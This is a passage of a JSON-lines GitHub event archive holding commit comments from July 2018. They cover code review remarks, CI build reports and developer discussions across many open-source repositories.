sending 2 to the browser.  Until https://github.com/yarnpkg/yarn/issues/579 is fixed, it's going to require intervention on your part to make sure that everything that can use the same version of lodash does.\r\n\r\nso the fact that react or instructure-ui themeable don't work with more than one copy loaded on the same page doesn't really mean anything in this conversation, you still need to train yourself to actually look at changes to yarn.lock after an `install` or `upgrade`"}},"created_at":"2018-07-26T19:14:23Z"}
{"id":"8024676202","type":"CommitCommentEvent","actor":{"login":"dieterguendisch"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":29848898,"position":74,"line":235,"path":"pkg/cloudprovider/providers/openstack/openstack_volumes.go","commit_id":"9326e845e48e2cc61f57094bd7561e37fb831ce5","created_at":"2018-07-26T19:14:27Z","updated_at":"2018-07-26T19:14:27Z","author_association":"NONE","body":"If I don't miss something here, it looks like you accidentally patched out the Size field (was added with the previous commit), therefore cinder resizing is still broken, see #58685 "}},"created_at":"2018-07-26T19:14:27Z"}
{"id":"8024677027","type":"CommitCommentEvent","actor":{"login":"JordySuos"},"repo":{"name":"TimCastelijns/Room15Bot"},"payload":{"comment":{"id":29848899,"position":null,"line":null,"path":null,"commit_id":"6e1a24ec5f4dcb046dd9b15c9e97bf0d6a1058ce","created_at":"2018-07-26T19:14:38Z","updated_at":"2018-07-26T19:14:38Z","author_association":"NONE","body":"RT"}},"created_at":"2018-07-26T19:14:38Z"}
{"id":"8024677230","type":"CommitCommentEvent","actor":{"login":"rtholmes"},"repo":{"name":"ubccpsc/classy"},"payload":{"comment":{"id":29848900,"position":6,"line":261,"path":"packages/portal/backend/src/server/common/AuthRoutes.ts","commit_id":"1645f2d282da50f24569d69342950ef10589529b","created_at":"2018-07-26T19:14:40Z","updated_at":"2018-07-26T19:14:40Z","author_association":"CONTRIBUTOR","body":"@nickbradley we really have to be more careful with these merges; this totally should not have been overwritten since it was definitely a newer change?"}},"created_at":"2018-07-26T19:14:40Z"}
{"id":"8024677408","type":"CommitCommentEvent","actor":{"login":"ViktoriyaRyazhska"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29848901,"position":23,"line":23,"path":"Homework9/MainL9Ex1.java","commit_id":"069afa24a6a4336026b711d5d84ee6a0a3f80ad1","created_at":"2018-07-26T19:14:43Z","updated_at":"2018-07-26T19:14:43Z","author_association":"OWNER","body":"при якій умові ми зможемо отримати це повідомлення?"}},"created_at":"2018-07-26T19:14:43Z"}
{"id":"8024685549","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ifqthenp/otus-spring-hw-02-java-annotations-config"},"payload":{"comment":{"id":29848922,"position":54,"line":54,"path":"build.gradle","commit_id":"6f6fc0e335210eb5d208f236ace1dd2d9b1fb8db","created_at":"2018-07-26T19:16:26Z","updated_at":"2018-07-26T19:16:26Z","author_association":"NONE","body":"О, крутотень!"}},"created_at":"2018-07-26T19:16:26Z"}
{"id":"8024686013","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29848923,"position":null,"line":null,"path":null,"commit_id":"fc91e747b7f09d1a7d95efde55fb7530df2b7809","created_at":"2018-07-26T19:16:32Z","updated_at":"2018-07-26T19:16:32Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2326 of 2328 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 626\n * Failed: 2\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.91%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-26T19:16:32Z"}
{"id":"8024690921","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29848932,"position":10,"line":20,"path":"otus/app/ux-component/dashboard-home-display/dashboard-home-display-component.js","commit_id":"ec400ef79ba1054d8f6f88e0b249cc5b601e0ef7","created_at":"2018-07-26T19:17:34Z","updated_at":"2018-07-26T19:17:34Z","author_association":"MEMBER","body":"A injeção sobre _$mdDialog_ continua sendo necessária? o código parece não utilizar mais."}},"created_at":"2018-07-26T19:17:34Z"}
{"id":"8024692363","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29848938,"position":null,"line":null,"path":null,"commit_id":"fc91e747b7f09d1a7d95efde55fb7530df2b7809","created_at":"2018-07-26T19:17:53Z","updated_at":"2018-07-26T19:17:53Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc91e747b7f09d1a7d95efde55fb7530df2b7809-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-26T19:17:53Z"}
{"id":"8024694298","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29848942,"position":7,"line":846,"path":"lib/elixir/test/elixir/kernel/errors_test.exs","commit_id":"c85419fda72509c08a67bb0016fa878f90aed6f6","created_at":"2018-07-26T19:18:16Z","updated_at":"2018-07-26T19:18:16Z","author_association":"MEMBER","body":"Good catch. I will do a search for \"definition header\" too."}},"created_at":"2018-07-26T19:18:16Z"}
{"id":"8024700738","type":"CommitCommentEvent","actor":{"login":"Hlcpereira"},"repo":{"name":"Hlcpereira/scripts"},"payload":{"comment":{"id":29848964,"position":null,"line":null,"path":null,"commit_id":"01c5bb1328cfb851094bfc169c6e8d85861065ed","created_at":"2018-07-26T19:19:39Z","updated_at":"2018-07-26T19:19:39Z","author_association":"OWNER","body":"Got it... lol :p "}},"created_at":"2018-07-26T19:19:39Z"}
{"id":"8024702632","type":"CommitCommentEvent","actor":{"login":"f5bud"},"repo":{"name":"omnirom/android_bootable_recovery"},"payload":{"comment":{"id":29848971,"position":null,"line":null,"path":null,"commit_id":"e11ce7535748fd9d658d5ce6d71d7785f7f82929","created_at":"2018-07-26T19:20:03Z","updated_at":"2018-07-26T19:20:03Z","author_association":"NONE","body":"commit ab0c92eb71690e694ae2eab941cb4f6b9cf5007d for minuitwrp/android.mk\r\ncommit e5896d668fbd22482943cf120b8f290e9857b8ce for minuitwrp/graphics_fbdev.cpp\r\n\r\nSorry I'm not comfortable with gerrit"}},"created_at":"2018-07-26T19:20:03Z"}
{"id":"8024702875","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29848973,"position":null,"line":null,"path":null,"commit_id":"e473e82049c6ee093f5305bdf07993a23d000c21","created_at":"2018-07-26T19:20:07Z","updated_at":"2018-07-26T19:20:07Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/changelog_preview.twig](https://github.com/pantheon-systems/documentation/commit/e473e82049c6ee093f5305bdf07993a23d000c21/source/_partials/changelog_preview.twig)\n"}},"created_at":"2018-07-26T19:20:07Z"}
{"id":"8024704585","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29848978,"position":42,"line":42,"path":"otus/app/module/participant/business/participant-messages-service.js","commit_id":"ec400ef79ba1054d8f6f88e0b249cc5b601e0ef7","created_at":"2018-07-26T19:20:28Z","updated_at":"2018-07-26T19:20:28Z","author_association":"MEMBER","body":"Minha sugestão é trocar _Voltar_ para _Cancelar_."}},"created_at":"2018-07-26T19:20:28Z"}
{"id":"8024705323","type":"CommitCommentEvent","actor":{"login":"jsanchezL"},"repo":{"name":"jsanchezL/vagrant-restore"},"payload":{"comment":{"id":29848983,"position":null,"line":null,"path":null,"commit_id":"7e7aea790a9ba08fefe994de1c7fbba81d051895","created_at":"2018-07-26T19:20:39Z","updated_at":"2018-07-26T19:20:39Z","author_association":"OWNER","body":"@betobaz"}},"created_at":"2018-07-26T19:20:39Z"}
{"id":"8024705454","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29848984,"position":null,"line":null,"path":null,"commit_id":"292ca30b69325b2ad5a56869b5cabfb69b96aae5","created_at":"2018-07-26T19:20:40Z","updated_at":"2018-07-26T19:20:40Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-158](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-158).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-158-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-26T19:20:40Z"}
{"id":"8024705837","type":"CommitCommentEvent","actor":{"login":"tiagomatana"},"repo":{"name":"ccem-dev/otus"},"payload":{"comment":{"id":29848985,"position":10,"line":20,"path":"otus/app/ux-component/dashboard-home-display/dashboard-home-display-component.js","commit_id":"ec400ef79ba1054d8f6f88e0b249cc5b601e0ef7","created_at":"2018-07-26T19:20:46Z","updated_at":"2018-07-26T19:20:46Z","author_association":"MEMBER","body":"Removido!"}},"created_at":"2018-07-26T19:20:46Z"}
{"id":"8024708637","type":"CommitCommentEvent","actor":{"login":"schnek"},"repo":{"name":"AscEmu/AscEmu"},"payload":{"comment":{"id":29848989,"position":10,"line":114,"path":"src/world/Server/Master.cpp","commit_id":"283338b30111cf580c2e9f60a81a94444daac7f1","created_at":"2018-07-26T19:21:23Z","updated_at":"2018-07-26T19:21:23Z","author_association":"CONTRIBUTOR","body":"#include <experimental/filesystem>"}},"created_at":"2018-07-26T19:21:23Z"}
{"id":"8024710629","type":"CommitCommentEvent","actor":{"login":"artixnous"},"repo":{"name":"artix-linux/packages"},"payload":{"comment":{"id":29848993,"position":null,"line":null,"path":null,"commit_id":"d2eaf861e67652397fa18fce8e86076743433992","created_at":"2018-07-26T19:21:49Z","updated_at":"2018-07-26T19:21:49Z","author_association":"MEMBER","body":"There is, I've included the initscript with it which is also kinda tailored to our setup ('need mysql')."}},"created_at":"2018-07-26T19:21:49Z"}
{"id":"8024712090","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ifqthenp/otus-spring-hw-02-java-annotations-config"},"payload":{"comment":{"id":29848995,"position":11,"line":11,"path":"src/main/java/com/otus/domain/model/Quiz.java","commit_id":"6f6fc0e335210eb5d208f236ace1dd2d9b1fb8db","created_at":"2018-07-26T19:22:09Z","updated_at":"2018-07-26T19:22:09Z","author_association":"NONE","body":"Крутяк"}},"created_at":"2018-07-26T19:22:09Z"}
{"id":"8024713273","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29849000,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T19:22:23Z","updated_at":"2018-07-26T19:22:23Z","author_association":"NONE","body":"Where is your unit test?"}},"created_at":"2018-07-26T19:22:23Z"}
{"id":"8024715192","type":"CommitCommentEvent","actor":{"login":"lgtyqz"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29849004,"position":null,"line":null,"path":null,"commit_id":"7d0b05dda7cc848f40da90964d8feb26b9d37361","created_at":"2018-07-26T19:22:48Z","updated_at":"2018-07-26T19:22:48Z","author_association":"CONTRIBUTOR","body":"Oh yeah, changed that, but forgot to push\r\n\r\nwhoops"}},"created_at":"2018-07-26T19:22:48Z"}
{"id":"8024747236","type":"CommitCommentEvent","actor":{"login":"punkusha"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29849070,"position":8,"line":10,"path":"src/App.tsx","commit_id":"f9bcda98ca13eadaafe9b59fdd339991539c7d5e","created_at":"2018-07-26T19:29:35Z","updated_at":"2018-07-26T19:29:35Z","author_association":"NONE","body":"most effective: \r\n```js\r\nselectedEntities: Map<string, IEntity>\r\n```"}},"created_at":"2018-07-26T19:29:35Z"}
{"id":"8024747787","type":"CommitCommentEvent","actor":{"login":"grahambell"},"repo":{"name":"Starlink/ORAC-DR"},"payload":{"comment":{"id":29849071,"position":null,"line":null,"path":null,"commit_id":"27031a817fd12219f7f9b8a673fa8b23d22d7a86","created_at":"2018-07-26T19:29:42Z","updated_at":"2018-07-26T19:29:42Z","author_association":"CONTRIBUTOR","body":"I think it got bigger a few years ago because the requested font (specified at the top of Xorac.pm with ```our $FONT = 'fixed';```) is no longer available.  (Tk now guarantees that fonts named \"Courier\", \"Times\" and \"Helvetica\" will be available.)  Without \"fixed\" it must have started choosing a larger (also non-monospaced) font.  I did try \"Courier\" but — with the font available on my machine at EAO — it was too spidery to be easy to read in the colour scheme used by ORAC-DR.\r\n\r\nDo you mean to change the size of the font, or the overall size of the window itself programmatically?  It looks like the window height is being constrained mostly by the font size of the text panes, and the width by the size of the ```\"ORAC-DR reducing observation\"``` box (and its font size).  If we had that box also change its font size, then a font size command line option might work for this?"}},"created_at":"2018-07-26T19:29:42Z"}
{"id":"8024750573","type":"CommitCommentEvent","actor":{"login":"ataulien"},"repo":{"name":"REGoth-project/REGoth"},"payload":{"comment":{"id":29849078,"position":73,"line":257,"path":"src/logic/CameraController.cpp","commit_id":"e13859649782bf33a6389cdcbf476fb5d62d897e","created_at":"2018-07-26T19:30:18Z","updated_at":"2018-07-26T19:30:18Z","author_association":"COLLABORATOR","body":"Not sure on the operator precedence here. Could you set some braces?"}},"created_at":"2018-07-26T19:30:18Z"}
{"id":"8024751022","type":"CommitCommentEvent","actor":{"login":"jcfr"},"repo":{"name":"Slicer/SlicerJupyter"},"payload":{"comment":{"id":29849079,"position":null,"line":null,"path":null,"commit_id":"d54771c0aa81fb10cc6d079dc23c3e86764e5032","created_at":"2018-07-26T19:30:23Z","updated_at":"2018-07-26T19:30:23Z","author_association":"MEMBER","body":"Gotcha.\n\nFor the repr, we have a plan to fix it.\n\nOn Thu, Jul 26, 2018, 3:02 PM Isaiah Norton <notifications@github.com>\nwrote:\n\n> I thought Slicer had crashed. (partly because the kernel currently doesn't\n> give any output for varname<ENTER> -- should print the output of repr,\n> but that's a separate issue).\n>\n> I would prefer to just have the Slicer window backgrounded behind the\n> browswer, but I don't think that is possible. So printing a notice in the\n> notebook that Slicer window has been minimized would be helpful.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Slicer/SlicerJupyter/commit/d54771c0aa81fb10cc6d079dc23c3e86764e5032#commitcomment-29848759>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AANXo3n6_7HLxaJUG5_KFZ5eK3LL-7DQks5uKhJdgaJpZM4ViTEE>\n> .\n>\n"}},"created_at":"2018-07-26T19:30:23Z"}
{"id":"8024752390","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ifqthenp/otus-spring-hw-02-java-annotations-config"},"payload":{"comment":{"id":29849082,"position":10,"line":10,"path":"src/main/java/com/otus/domain/model/Quiz.java","commit_id":"6f6fc0e335210eb5d208f236ace1dd2d9b1fb8db","created_at":"2018-07-26T19:30:39Z","updated_at":"2018-07-26T19:30:39Z","author_association":"NONE","body":"Скобочки на новой строке не по рекомендациям кодирования"}},"created_at":"2018-07-26T19:30:39Z"}
{"id":"8024752861","type":"CommitCommentEvent","actor":{"login":"pavel-kirienko"},"repo":{"name":"UAVCAN/libuavcan"},"payload":{"comment":{"id":29849083,"position":124,"line":187,"path":"libuavcan/test/transport/dispatcher.cpp","commit_id":"88ed4892f4191a8dd04c209dbd35688f6f18036e","created_at":"2018-07-26T19:30:44Z","updated_at":"2018-07-26T19:30:44Z","author_association":"MEMBER","body":"You seem to be preferring M. Bulgakov over D. Adams here. Does that not undermine the test coverage?"}},"created_at":"2018-07-26T19:30:44Z"}
{"id":"8024752935","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29849084,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T19:30:45Z","updated_at":"2018-07-26T19:30:45Z","author_association":"NONE","body":"How comes it's not here?"}},"created_at":"2018-07-26T19:30:45Z"}
{"id":"8024754077","type":"CommitCommentEvent","actor":{"login":"JonyHuergo"},"repo":{"name":"JonyHuergo/ProyectoIntegrador-Laravel-"},"payload":{"comment":{"id":29849088,"position":null,"line":null,"path":null,"commit_id":"94efe32b4f9e4d9e0eda58da932504310d619604","created_at":"2018-07-26T19:30:58Z","updated_at":"2018-07-26T19:30:58Z","author_association":"OWNER","body":"Que hipster sos Lucas"}},"created_at":"2018-07-26T19:30:58Z"}
{"id":"8024755138","type":"CommitCommentEvent","actor":{"login":"gacholio"},"repo":{"name":"eclipse/openj9"},"payload":{"comment":{"id":29849089,"position":6,"line":973,"path":"runtime/vm/createramclass.cpp","commit_id":"28bad4890f6bd7cb16317d98f98a76940ab3ae96","created_at":"2018-07-26T19:31:09Z","updated_at":"2018-07-26T19:31:09Z","author_association":"CONTRIBUTOR","body":"```*vTableAddress = *(J9VTableHeader *)vTable;\r\nvTableAddress->size = count;'''"}},"created_at":"2018-07-26T19:31:09Z"}
{"id":"8024755744","type":"CommitCommentEvent","actor":{"login":"jmilloy"},"repo":{"name":"creare-com/podpac"},"payload":{"comment":{"id":29849092,"position":null,"line":null,"path":null,"commit_id":"884791e5b50de7495dee41ad0620564522bac2b3","created_at":"2018-07-26T19:31:16Z","updated_at":"2018-07-26T19:31:16Z","author_association":"COLLABORATOR","body":"@mpu-creare Okay so it's back to 85%. The biggest culprit is the coordinates. I will try to get that up tomorrow without spending much time (because a lot of that will change)."}},"created_at":"2018-07-26T19:31:16Z"}
{"id":"8024756627","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29849095,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T19:31:27Z","updated_at":"2018-07-26T19:31:27Z","author_association":"NONE","body":"Which one exactly?"}},"created_at":"2018-07-26T19:31:27Z"}
{"id":"8024757330","type":"CommitCommentEvent","actor":{"login":"ataulien"},"repo":{"name":"REGoth-project/REGoth"},"payload":{"comment":{"id":29849096,"position":87,"line":271,"path":"src/logic/CameraController.cpp","commit_id":"e13859649782bf33a6389cdcbf476fb5d62d897e","created_at":"2018-07-26T19:31:36Z","updated_at":"2018-07-26T19:31:36Z","author_association":"COLLABORATOR","body":"Could this '4' be a constant? Or encodes as the last enum value?"}},"created_at":"2018-07-26T19:31:36Z"}
{"id":"8024760288","type":"CommitCommentEvent","actor":{"login":"wluyima"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29849099,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T19:32:12Z","updated_at":"2018-07-26T19:32:12Z","author_association":"NONE","body":"And what's not working? Are you getting an exception or what?"}},"created_at":"2018-07-26T19:32:12Z"}
{"id":"8024763209","type":"CommitCommentEvent","actor":{"login":"schettino72"},"repo":{"name":"schettino72/sqla_yaml_fixtures"},"payload":{"comment":{"id":29849103,"position":2,"line":1,"path":"CHANGES","commit_id":"89b1567d265a5eb6504f5cfceb9c8f34102ee2db","created_at":"2018-07-26T19:32:47Z","updated_at":"2018-07-26T19:32:47Z","author_association":"OWNER","body":"When bumping the version number you also need to modify: https://github.com/schettino72/sqla_yaml_fixtures/blob/master/sqla_yaml_fixtures/__init__.py#L12"}},"created_at":"2018-07-26T19:32:47Z"}
{"id":"8024764293","type":"CommitCommentEvent","actor":{"login":"somas95"},"repo":{"name":"flathub/de.wolfvollprecht.UberWriter"},"payload":{"comment":{"id":29849107,"position":null,"line":null,"path":null,"commit_id":"6e777f84567a563a56386fd722505ce1a68f0c7c","created_at":"2018-07-26T19:33:01Z","updated_at":"2018-07-26T19:33:01Z","author_association":"COLLABORATOR","body":"It failed to build, I changed it to see if the runtime version was the cause. The it built right\r\nStill, now failed to build in a new update. Seems that always fails to build the first time, idk why, and we can't trigger rebuilds without making PR to the repo. I'll revert that, by the way"}},"created_at":"2018-07-26T19:33:01Z"}
{"id":"8024764432","type":"CommitCommentEvent","actor":{"login":"adrianodennanni"},"repo":{"name":"giselyalves13/twitter_rails"},"payload":{"comment":{"id":29849109,"position":4,"line":4,"path":"app/controllers/sessions_controller.rb","commit_id":"37bc459505fdcb8433b18f86d8d714a9865089a9","created_at":"2018-07-26T19:33:03Z","updated_at":"2018-07-26T19:33:03Z","author_association":"NONE","body":"Se eu tento logar e o user não existe, esta ação é executada. Mas como ela não tem layout definido, eu obtenho de volta um erro de \"Missing template sessions/new\", ao invés de informar que o usuário não existe."}},"created_at":"2018-07-26T19:33:03Z"}
{"id":"8024765437","type":"CommitCommentEvent","actor":{"login":"BrennanColberg"},"repo":{"name":"BrennanColberg/axis-allies"},"payload":{"comment":{"id":29849110,"position":null,"line":null,"path":null,"commit_id":"22bc50bc86bd61e6f6e1346e5ee05c24a7a0fa26","created_at":"2018-07-26T19:33:16Z","updated_at":"2018-07-26T19:33:16Z","author_association":"OWNER","body":"other things (premature commit):\r\n- imported files from jsdb\r\n- moved over some shorthand to use jsdb instead\r\n- changed control.js to use JSON/jsdb "}},"created_at":"2018-07-26T19:33:16Z"}
{"id":"8024766211","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ifqthenp/otus-spring-hw-02-java-annotations-config"},"payload":{"comment":{"id":29849115,"position":36,"line":36,"path":"src/main/java/com/otus/spring/service/impl/QuizServiceImpl.java","commit_id":"6f6fc0e335210eb5d208f236ace1dd2d9b1fb8db","created_at":"2018-07-26T19:33:26Z","updated_at":"2018-07-26T19:33:26Z","author_association":"NONE","body":"А при выходе он закроет system.in)))"}},"created_at":"2018-07-26T19:33:26Z"}
{"id":"8024769232","type":"CommitCommentEvent","actor":{"login":"kaweesi"},"repo":{"name":"jembi/openmrs-module-msfcore"},"payload":{"comment":{"id":29849119,"position":null,"line":null,"path":null,"commit_id":"e4317249e73da99bf34c4a78b8de9d71c96a6b88","created_at":"2018-07-26T19:34:06Z","updated_at":"2018-07-26T19:34:06Z","author_association":"COLLABORATOR","body":"When i run a baseSensitive test like that one, spring fails initialising\nbeans as logged at:\nhttps://gist.github.com/kaweesi/33ed2d87040456a865cecf4381b9036e\n\nOn Thu, Jul 26, 2018 at 10:31 PM Wyclif Luyima <notifications@github.com>\nwrote:\n\n> Which one exactly?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jembi/openmrs-module-msfcore/commit/e4317249e73da99bf34c4a78b8de9d71c96a6b88#commitcomment-29849095>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APJk8v7H4k106ASD6-ix6zgKyX2FJ39zks5uKhkPgaJpZM4ViVWD>\n> .\n>\n\n\n-- \n\n*Kaweesi Joseph*\n\n*Jembi Health Systems NPC* *|  **Uganda*\n\n*Mobile: **+256784994313** | Office: **Software Developer** | Skype:*\n*kaweesi.joseph*\n*E-mail: kaweesi@jembi.org <kaweesi@jembi.org>*\n\n\n\n*This e-mail contains proprietary and confidential information some or all\nof which may be legally privileged. It is for the intended recipient only.\nIf an addressing or transmission error has misdirected this e-mail, please\nnotify the author by replying to this e-mail and then deleting same. If you\nare not the intended recipient you must not use, disclose, distribute,\ncopy, print or rely on this e-mail. Jembi Health Systems NPO, its\nsubsidiaries and associated companies is not liable for the security of\ninformation sent by e-mail and accepts no liability of whatsoever nature\nfor any loss, damage or expense resulting, directly or indirectly, from the\naccess of this e-mail or any attachments hereto.*\n"}},"created_at":"2018-07-26T19:34:06Z"}
{"id":"8024771963","type":"CommitCommentEvent","actor":{"login":"punkusha"},"repo":{"name":"stasgm/qb-test"},"payload":{"comment":{"id":29849124,"position":17,"line":26,"path":"package.json","commit_id":"f9bcda98ca13eadaafe9b59fdd339991539c7d5e","created_at":"2018-07-26T19:34:40Z","updated_at":"2018-07-26T19:34:40Z","author_association":"NONE","body":"deprecated.\r\n> since webpack v4 the extract-text-webpack-plugin should not be used for css. use mini-css-extract-plugin instead."}},"created_at":"2018-07-26T19:34:40Z"}
{"id":"8024772453","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29849127,"position":null,"line":null,"path":null,"commit_id":"478629fc958d28a523afaa12b5c4758006a275e1","created_at":"2018-07-26T19:34:46Z","updated_at":"2018-07-26T19:34:46Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3727change](https://3727change-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/changelog_preview.twig](https://github.com/pantheon-systems/documentation/commit/478629fc958d28a523afaa12b5c4758006a275e1/source/_partials/changelog_preview.twig)\n"}},"created_at":"2018-07-26T19:34:46Z"}
{"id":"8024774392","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"ifqthenp/otus-spring-hw-02-java-annotations-config"},"payload":{"comment":{"id":29849129,"position":11,"line":11,"path":"src/main/java/com/otus/spring/service/impl/ResourceServiceImpl.java","commit_id":"6f6fc0e335210eb5d208f236ace1dd2d9b1fb8db","created_at":"2018-07-26T19:35:11Z","updated_at":"2018-07-26T19:35:11Z","author_association":"NONE","body":"Хех. я бы не делал сервис, прямо для одного поля..."}},"created_at":"2018-07-26T19:35:11Z"}
{"id":"8024776231","type":"CommitCommentEvent","actor":{"login":"keshav2010"},"repo":{"name":"keshav2010/ProtoAnimator"},"payload":{"comment":{"id":29849134,"position":null,"line":null,"path":null,"commit_id":"114673d0da349b0d9e07eaba96e2687ade877df8","created_at":"2018-07-26T19:35:32Z","updated_at":"2018-07-26T19:35:32Z","author_association":"OWNER","body":"closed issue #11 "}},"created_at":"2018-07-26T19:35:32Z"}
{"id":"8024784894","type":"CommitCommentEvent","actor":{"login":"vsevolodroschupkin"},"repo":{"name":"htmlacademy-htmlcss/151400-gllacy"},"payload":{"comment":{"id":29849143,"position":null,"line":null,"path":null,"commit_id":"29345663a848227c51a57f6778f9b7086d833a88","created_at":"2018-07-26T19:37:23Z","updated_at":"2018-07-26T19:37:23Z","author_association":"CONTRIBUTOR","body":"дло\r\n![2018-04-23_14-40-47](https://user-images.githubusercontent.com/34702673/43284432-33c35670-9135-11e8-9f22-a66cbc9817a7.png)\r\n"}},"created_at":"2018-07-26T19:37:23Z"}
{"id":"8024785050","type":"CommitCommentEvent","actor":{"login":"MangoSalad"},"repo":{"name":"theycallmeljefe/Bitcoin_Mining"},"payload":{"comment":{"id":29849144,"position":null,"line":null,"path":null,"commit_id":"b6afbbfd478023ba0bb8e83a83cfe550e35cebef","created_at":"2018-07-26T19:37:25Z","updated_at":"2018-07-26T19:37:25Z","author_association":"COLLABORATOR","body":"I agree to include in history because it gives it context - getblocktemplate isn't really being used but it might be worthwhile to acknowledge that its still an option for miners\r\n"}},"created_at":"2018-07-26T19:37:25Z"}
{"id":"8024785829","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29849146,"position":41,"line":41,"path":"lesson3/station.rb","commit_id":"0bb4d57a6b0784c85acc983998a878f3ab677036","created_at":"2018-07-26T19:37:35Z","updated_at":"2018-07-26T19:37:35Z","author_association":"NONE","body":"здесь `self` не нужен\r\nвнутри инстанс-методов `self` по умолчанию, т.е. при вызове метода без использования слова `self` - текущий объект\r\n```ruby\r\ndef some_method\r\n  do_something\r\n  # подразумевается self.do_something, т.е. вызов метода на текущем объекте\r\nend\r\n```\r\nявно `self` пишется только в случае, если происходит присвоение через сеттер значения какой-либо инстанс переменной (делается это, чтобы не было двусмысленности, чтобы можно было легко различить - это присвоение значения локальной переменной или это обращение к сеттеру)\r\n```ruby\r\ndef some_method(some_attribute)\r\n  self.some_attribute = some_attribute # подразумевается @some_attribute = some_attribute\r\n  some_attribute = 5 # присвоение значения локальной переменной\r\n  do_something_else(some_attribute)\r\nend\r\n```"}},"created_at":"2018-07-26T19:37:35Z"}
